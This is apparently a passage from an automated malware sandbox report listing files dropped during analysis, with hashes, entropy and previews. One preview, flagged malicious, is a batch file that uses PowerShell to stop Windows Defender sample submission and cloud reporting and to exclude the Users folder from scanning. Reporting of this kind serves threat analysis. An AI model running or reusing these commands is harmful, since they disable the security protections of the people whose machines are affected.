                                                                                                                                                SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                                                                                                                                                MD5:458F2D710689EA3CF61D5CD97C6B2470
                                                                                                                                                SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                                                                                                                                                SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                                                                                                                                                SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:DOS batch file, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):259
                                                                                                                                                Entropy (8bit):4.933902901538645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                                                                                                                MD5:261A842203ADB67547C83DE132C7A076
                                                                                                                                                SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                                                                                                                SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                                                                                                                SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process: